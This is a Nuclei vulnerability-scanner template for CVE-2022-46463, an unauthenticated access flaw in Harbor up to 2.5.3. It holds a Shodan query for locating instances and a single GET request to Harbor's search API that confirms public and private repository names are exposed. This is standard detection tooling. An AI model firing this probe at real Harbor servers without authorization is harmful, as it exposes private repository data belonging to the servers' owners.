nuclei-templates/http/cves/2022/CVE-2022-46463.yaml

38 lines
904 B
YAML

id: CVE-2022-46463
info:
name: Harbor <=2.5.3 - Unauthorized Access
author: Arm!tage
severity: high
description: |
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-46463
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-306
metadata:
max-request: 1
shodan-query: http.favicon.hash:657337228
verified: true
tags: cve,cve2022,harbor,auth-bypass,exposure
http:
- method: GET
path:
- "{{BaseURL}}/api/v2.0/search?q=/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "repository_name"
- "project_name"
condition: and
- type: status
status:
- 200